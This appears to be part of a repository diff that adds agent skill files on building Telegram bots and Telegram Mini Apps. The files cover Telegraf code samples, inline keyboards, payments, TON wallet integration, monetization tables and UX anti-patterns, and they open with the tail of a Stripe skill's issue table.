| Trusting API responses instead of webhooks for payment status | critical | Webhook-first architecture |
| Not passing metadata through checkout session | high | Always include metadata |
| Local subscription state drifting from Stripe state | high | Handle ALL subscription webhooks |
| Not handling failed payments and dunning | high | Handle invoice.payment_failed |
| Different code paths or behavior between test and live mode | high | Separate all keys |

## Related Skills

Works well with: `nextjs-supabase-auth`, `supabase-backend`, `webhook-patterns`, `security`
skills/telegram-bot-builder/SKILL.md (new file, 254 lines)
---
name: telegram-bot-builder
description: "Expert in building Telegram bots that solve real problems - from simple automation to complex AI-powered bots. Covers bot architecture, the Telegram Bot API, user experience, monetization strategies, and scaling bots to thousands of users. Use when: telegram bot, bot api, telegram automation, chat bot telegram, tg bot."
source: vibeship-spawner-skills (Apache 2.0)
---

# Telegram Bot Builder

**Role**: Telegram Bot Architect

You build bots that people actually use daily. You understand that bots should feel like helpful assistants, not clunky interfaces. You know the Telegram ecosystem deeply - what's possible, what's popular, and what makes money. You design conversations that feel natural.

## Capabilities

- Telegram Bot API
- Bot architecture
- Command design
- Inline keyboards
- Bot monetization
- User onboarding
- Bot analytics
- Webhook management

## Patterns

### Bot Architecture

Structure for maintainable Telegram bots

**When to use**: When starting a new bot project

### Stack Options

| Language | Library | Best For |
|----------|---------|----------|
| Node.js | telegraf | Most projects |
| Node.js | grammY | TypeScript, modern |
| Python | python-telegram-bot | Quick prototypes |
| Python | aiogram | Async, scalable |

### Basic Telegraf Setup

```javascript
import { Telegraf } from 'telegraf';

const bot = new Telegraf(process.env.BOT_TOKEN);

// Command handlers
bot.start((ctx) => ctx.reply('Welcome!'));
bot.help((ctx) => ctx.reply('How can I help?'));

// Text handler
bot.on('text', (ctx) => {
  ctx.reply(`You said: ${ctx.message.text}`);
});

// Launch
bot.launch();

// Graceful shutdown
process.once('SIGINT', () => bot.stop('SIGINT'));
process.once('SIGTERM', () => bot.stop('SIGTERM'));
```

### Project Structure

```
telegram-bot/
├── src/
│   ├── bot.js           # Bot initialization
│   ├── commands/        # Command handlers
│   │   ├── start.js
│   │   ├── help.js
│   │   └── settings.js
│   ├── handlers/        # Message handlers
│   ├── keyboards/       # Inline keyboards
│   ├── middleware/      # Auth, logging
│   └── services/        # Business logic
├── .env
└── package.json
```

### Inline Keyboards

Interactive button interfaces

**When to use**: When building interactive bot flows

### Basic Keyboard

```javascript
import { Markup } from 'telegraf';

bot.command('menu', (ctx) => {
  ctx.reply('Choose an option:', Markup.inlineKeyboard([
    [Markup.button.callback('Option 1', 'opt_1')],
    [Markup.button.callback('Option 2', 'opt_2')],
    [
      Markup.button.callback('Yes', 'yes'),
      Markup.button.callback('No', 'no'),
    ],
  ]));
});

// Handle button clicks
bot.action('opt_1', (ctx) => {
  ctx.answerCbQuery('You chose Option 1');
  ctx.editMessageText('You selected Option 1');
});
```

### Keyboard Patterns

| Pattern | Use Case |
|---------|----------|
| Single column | Simple menus |
| Multi column | Yes/No, pagination |
| Grid | Category selection |
| URL buttons | Links, payments |

### Pagination

```javascript
function getPaginatedKeyboard(items, page, perPage = 5) {
  const start = page * perPage;
  const pageItems = items.slice(start, start + perPage);

  const buttons = pageItems.map(item =>
    [Markup.button.callback(item.name, `item_${item.id}`)]
  );

  const nav = [];
  if (page > 0) nav.push(Markup.button.callback('◀️', `page_${page-1}`));
  if (start + perPage < items.length) nav.push(Markup.button.callback('▶️', `page_${page+1}`));

  return Markup.inlineKeyboard([...buttons, nav]);
}
```

### Bot Monetization

Making money from Telegram bots

**When to use**: When planning bot revenue

### Revenue Models

| Model | Example | Complexity |
|-------|---------|------------|
| Freemium | Free basic, paid premium | Medium |
| Subscription | Monthly access | Medium |
| Per-use | Pay per action | Low |
| Ads | Sponsored messages | Low |
| Affiliate | Product recommendations | Low |

### Telegram Payments

```javascript
// Create an invoice
bot.command('buy', (ctx) => {
  ctx.replyWithInvoice({
    title: 'Premium Access',
    description: 'Unlock all features',
    payload: 'premium_monthly',
    provider_token: process.env.PAYMENT_TOKEN,
    currency: 'USD',
    prices: [{ label: 'Premium', amount: 999 }], // $9.99
  });
});

// Handle successful payment (handler must be async to use await)
bot.on('successful_payment', async (ctx) => {
  const payment = ctx.message.successful_payment;
  // Activate premium for the user
  await activatePremium(ctx.from.id);
  ctx.reply('🎉 Premium activated!');
});
```

### Freemium Strategy

```
Free tier:
- 10 uses per day
- Basic features
- Ads shown

Premium ($5/month):
- Unlimited uses
- Advanced features
- No ads
- Priority support
```

### Usage Limits

```javascript
async function checkUsage(userId) {
  const usage = await getUsage(userId);
  const isPremium = await checkPremium(userId);

  if (!isPremium && usage >= 10) {
    return { allowed: false, message: 'Daily limit reached. Upgrade?' };
  }
  return { allowed: true };
}
```

## Anti-Patterns

### ❌ Blocking Operations

**Why bad**: Telegram has timeout limits. Users think the bot is dead. Poor experience. Requests pile up.

**Instead**: Acknowledge immediately. Process in the background. Send an update when done. Use the typing indicator.
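The "acknowledge first" advice can be sketched as a small wrapper (the wrapper name and the slow-work function are illustrative): reply right away, then finish the slow work off the request path and message the user when it completes.

```javascript
// Wrap a slow handler so the user gets an immediate acknowledgement
// while the real work runs in the background.
function withImmediateAck(slowWork) {
  return async (ctx) => {
    await ctx.reply('Working on it…'); // instant feedback
    // Fire-and-forget: do not block Telegram's update delivery.
    slowWork(ctx)
      .then((result) => ctx.reply(result))
      .catch(() => ctx.reply('Something went wrong, try again.'));
  };
}

// Hypothetical wiring with telegraf:
// bot.command('report', withImmediateAck(generateReport));
```

For long jobs, `ctx.sendChatAction('typing')` between the acknowledgement and the final message keeps the conversation feeling alive.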

### ❌ No Error Handling

**Why bad**: Users get no response. Bot appears broken. Debugging nightmare. Lost trust.

**Instead**: Global error handler. Graceful error messages. Log errors for debugging. Rate limiting.
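A minimal sketch of the handler side (telegraf's real `bot.catch` is shown as a comment; the `safeHandler` wrapper is illustrative): every failure is logged and turned into a graceful message instead of silence.

```javascript
// Wrap any handler so failures are logged and the user still gets a reply.
function safeHandler(handler) {
  return async (ctx) => {
    try {
      await handler(ctx);
    } catch (err) {
      console.error('handler failed:', err.message);
      await ctx.reply('Sorry, something went wrong. Please try again.');
    }
  };
}

// With telegraf you would also register a global catch-all:
// bot.catch((err, ctx) => console.error(`error for ${ctx.updateType}`, err));
```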

### ❌ Spammy Bot

**Why bad**: Users block the bot. Telegram may ban it. Annoying experience. Low retention.

**Instead**: Respect user attention. Consolidate messages. Allow notification control. Quality over quantity.

## Related Skills

Works well with: `telegram-mini-app`, `backend`, `ai-wrapper-product`, `workflow-automation`
skills/telegram-mini-app/SKILL.md (new file, 279 lines)
---
|
||||
name: telegram-mini-app
|
||||
description: "Expert in building Telegram Mini Apps (TWA) - web apps that run inside Telegram with native-like experience. Covers the TON ecosystem, Telegram Web App API, payments, user authentication, and building viral mini apps that monetize. Use when: telegram mini app, TWA, telegram web app, TON app, mini app."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Telegram Mini App
|
||||
|
||||
**Role**: Telegram Mini App Architect
|
||||
|
||||
You build apps where 800M+ Telegram users already are. You understand
|
||||
the Mini App ecosystem is exploding - games, DeFi, utilities, social
|
||||
apps. You know TON blockchain and how to monetize with crypto. You
|
||||
design for the Telegram UX paradigm, not traditional web.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Telegram Web App API
|
||||
- Mini App architecture
|
||||
- TON Connect integration
|
||||
- In-app payments
|
||||
- User authentication via Telegram
|
||||
- Mini App UX patterns
|
||||
- Viral Mini App mechanics
|
||||
- TON blockchain integration
|
||||
|
||||
## Patterns
|
||||
|
||||
### Mini App Setup
|
||||
|
||||
Getting started with Telegram Mini Apps
|
||||
|
||||
**When to use**: When starting a new Mini App
|
||||
|
||||
```javascript
|
||||
## Mini App Setup
|
||||
|
||||
### Basic Structure
|
||||
```html
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||
<script src="https://telegram.org/js/telegram-web-app.js"></script>
|
||||
</head>
|
||||
<body>
|
||||
<script>
|
||||
const tg = window.Telegram.WebApp;
|
||||
tg.ready();
|
||||
tg.expand();
|
||||
|
||||
// User data
|
||||
const user = tg.initDataUnsafe.user;
|
||||
console.log(user.first_name, user.id);
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
```
|
||||
|
||||
#### React Setup

```jsx
// hooks/useTelegram.js
export function useTelegram() {
  const tg = window.Telegram?.WebApp;

  return {
    tg,
    user: tg?.initDataUnsafe?.user,
    queryId: tg?.initDataUnsafe?.query_id,
    expand: () => tg?.expand(),
    close: () => tg?.close(),
    ready: () => tg?.ready(),
  };
}

// App.jsx
import { useEffect } from 'react';
import { useTelegram } from './hooks/useTelegram';

function App() {
  const { user, expand, ready } = useTelegram();

  useEffect(() => {
    ready();
    expand();
  }, []);

  return <div>Hello, {user?.first_name}</div>;
}
```
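For the screen's primary action, prefer Telegram's native MainButton over a custom in-page button. The `MainButton` methods used here (`setText`, `show`, `hide`, `onClick`, `offClick`) are part of the Telegram WebApp API; the helper itself is a hypothetical sketch:

```javascript
// Wire up Telegram's native MainButton for the screen's primary action.
// `tg` is window.Telegram.WebApp, passed in explicitly.
// Returns a cleanup function for SPA-style navigation.
function setupMainButton(tg, text, onClick) {
  tg.MainButton.setText(text);
  tg.MainButton.onClick(onClick);
  tg.MainButton.show();

  return () => {
    tg.MainButton.offClick(onClick);
    tg.MainButton.hide();
  };
}

// Usage: const cleanup = setupMainButton(window.Telegram.WebApp, 'Pay now', submitOrder);
```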
#### Bot Integration

```javascript
// Bot sends a button that opens the Mini App
bot.command('app', (ctx) => {
  ctx.reply('Open the app:', {
    reply_markup: {
      inline_keyboard: [[
        { text: '🚀 Open App', web_app: { url: 'https://your-app.com' } }
      ]]
    }
  });
});
```
### TON Connect Integration

Wallet connection for the TON blockchain.

**When to use**: When building Web3 Mini Apps.

#### Setup

```bash
npm install @tonconnect/ui-react
```

#### React Integration

```jsx
import { TonConnectUIProvider, TonConnectButton } from '@tonconnect/ui-react';

// Wrap the app
function App() {
  return (
    <TonConnectUIProvider manifestUrl="https://your-app.com/tonconnect-manifest.json">
      <MainApp />
    </TonConnectUIProvider>
  );
}

// Use in components
function WalletSection() {
  return <TonConnectButton />;
}
```
#### Manifest File

```json
{
  "url": "https://your-app.com",
  "name": "Your Mini App",
  "iconUrl": "https://your-app.com/icon.png"
}
```

#### Send TON Transaction

```jsx
import { useTonConnectUI } from '@tonconnect/ui-react';

function PaymentButton({ amount, to }) {
  const [tonConnectUI] = useTonConnectUI();

  const handlePay = async () => {
    const transaction = {
      validUntil: Math.floor(Date.now() / 1000) + 60, // valid for 60 seconds
      messages: [{
        address: to,
        amount: (amount * 1e9).toString(), // TON to nanoton
      }]
    };

    await tonConnectUI.sendTransaction(transaction);
  };

  return <button onClick={handlePay}>Pay {amount} TON</button>;
}
```
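One detail worth noting in the transaction above: `amount * 1e9` uses floating-point math, which can produce off-by-one nanoton values for some decimal amounts. A hypothetical BigInt-based converter avoids that (assumes a non-negative decimal amount):

```javascript
// Convert a decimal TON amount (string or number) to a nanoton string.
// 1 TON = 1e9 nanoton. Uses BigInt to avoid floating-point rounding.
function toNano(ton) {
  const [whole, frac = ''] = String(ton).split('.');
  const fracPadded = (frac + '000000000').slice(0, 9); // pad/truncate to 9 digits
  return (BigInt(whole || '0') * 1000000000n + BigInt(fracPadded)).toString();
}
```

Then use `amount: toNano(amount)` when building the message.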
### Mini App Monetization

Making money from Mini Apps.

**When to use**: When planning Mini App revenue.

#### Revenue Streams

| Model | Example | Potential |
|-------|---------|-----------|
| TON payments | Premium features | High |
| In-app purchases | Virtual goods | High |
| Ads (Telegram Ads) | Display ads | Medium |
| Referral | Share to earn | Medium |
| NFT sales | Digital collectibles | High |

#### Telegram Stars (New!)

```javascript
// In your bot
bot.command('premium', (ctx) => {
  ctx.replyWithInvoice({
    title: 'Premium Access',
    description: 'Unlock all features',
    payload: 'premium',
    provider_token: '', // Empty for Stars
    currency: 'XTR', // Telegram Stars
    prices: [{ label: 'Premium', amount: 100 }], // 100 Stars
  });
});
```
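The invoice above is only half the flow: Telegram sends the bot a `pre_checkout_query` that must be answered quickly (within roughly 10 seconds) or the payment fails. A hedged sketch, with the approval decision pulled into a plain function and the Telegraf wiring left as illustrative comments:

```javascript
// Decide whether a pre-checkout query matches a payload we actually sell.
function shouldApproveCheckout(query, knownPayloads) {
  return knownPayloads.has(query.invoice_payload);
}

// Illustrative Telegraf wiring (bot instance assumed, as in the examples above):
// bot.on('pre_checkout_query', (ctx) => {
//   const ok = shouldApproveCheckout(ctx.preCheckoutQuery, new Set(['premium']));
//   return ctx.answerPreCheckoutQuery(ok, ok ? undefined : 'Unknown product');
// });
// After approval, Telegram delivers a successful_payment message -> grant access there.
```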
#### Viral Mechanics

```jsx
// Referral system
function ReferralShare() {
  const { tg, user } = useTelegram();
  const referralLink = `https://t.me/your_bot?start=ref_${user.id}`;

  const share = () => {
    tg.openTelegramLink(
      `https://t.me/share/url?url=${encodeURIComponent(referralLink)}&text=Check this out!`
    );
  };

  return <button onClick={share}>Invite Friends (+10 coins)</button>;
}
```
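The bot side of the referral loop has to recover the referrer from the `/start` payload. A hypothetical parser for the `ref_<id>` convention used above:

```javascript
// Extract the referrer's numeric id from a /start message like "/start ref_12345".
// Returns null for plain /start or a malformed payload.
function parseReferrerId(text) {
  const match = /^\/start\s+ref_(\d+)\s*$/.exec(text);
  return match ? Number(match[1]) : null;
}

// Usage sketch: bot.start((ctx) => {
//   const referrerId = parseReferrerId(ctx.message.text);
//   if (referrerId) creditReferrer(referrerId); // hypothetical reward helper
// });
```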
#### Gamification for Retention

- Daily rewards
- Streak bonuses
- Leaderboards
- Achievement badges
- Referral bonuses
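The streak bonus in the list above boils down to a small piece of date math. A hypothetical sketch using UTC day numbers (timestamps in milliseconds):

```javascript
const DAY_MS = 86400000;

// Return the updated streak count for a check-in at `nowMs`,
// given the previous check-in time and the current streak.
function nextStreak(lastCheckInMs, nowMs, streak) {
  const dayDiff = Math.floor(nowMs / DAY_MS) - Math.floor(lastCheckInMs / DAY_MS);
  if (dayDiff === 0) return streak;     // already checked in today
  if (dayDiff === 1) return streak + 1; // consecutive day: extend streak
  return 1;                             // missed a day: restart
}
```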
## Anti-Patterns

### ❌ Ignoring Telegram Theme

**Why bad**: Feels foreign in Telegram. Bad user experience. Jarring transitions. Users don't trust it.

**Instead**: Use `tg.themeParams`. Match Telegram colors. Use native-feeling UI. Test in both light and dark mode.
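Matching the theme can be done generically by mapping `tg.themeParams` (keys like `bg_color`, `text_color`) onto CSS custom properties. A hypothetical helper:

```javascript
// Expose Telegram theme params as CSS variables, e.g. bg_color -> --tg-bg-color.
function applyTheme(themeParams, rootElement) {
  for (const [key, value] of Object.entries(themeParams)) {
    rootElement.style.setProperty(`--tg-${key.replace(/_/g, '-')}`, value);
  }
}

// Usage: applyTheme(window.Telegram.WebApp.themeParams, document.documentElement);
// Then in CSS: body { background: var(--tg-bg-color); color: var(--tg-text-color); }
```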
### ❌ Desktop-First Mini App

**Why bad**: 95% of Telegram usage is mobile. Touch targets too small. Doesn't fit in the Telegram UI. Scrolling issues.

**Instead**: Mobile-first, always. Test on real phones. Touch-friendly buttons. Fit within the Telegram frame.

### ❌ No Loading States

**Why bad**: Users think it's broken. Poor perceived performance. High exit rate. Confusion.

**Instead**: Show skeleton UI. Loading indicators. Progressive loading. Optimistic updates.
## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Not validating initData from Telegram | high | Verify the initData HMAC server-side with your bot token; never trust `initDataUnsafe` |
| TON Connect not working on mobile | high | Test wallet deep links on real devices; provide a fallback connect flow |
| Mini App feels slow and janky | medium | Keep the bundle small, show skeleton UI, lazy-load heavy views |
| Custom buttons instead of MainButton | medium | Use `tg.MainButton` for the primary action so the UI feels native |

## Related Skills

Works well with: `telegram-bot-builder`, `frontend`, `blockchain-defi`, `viral-generator-builder`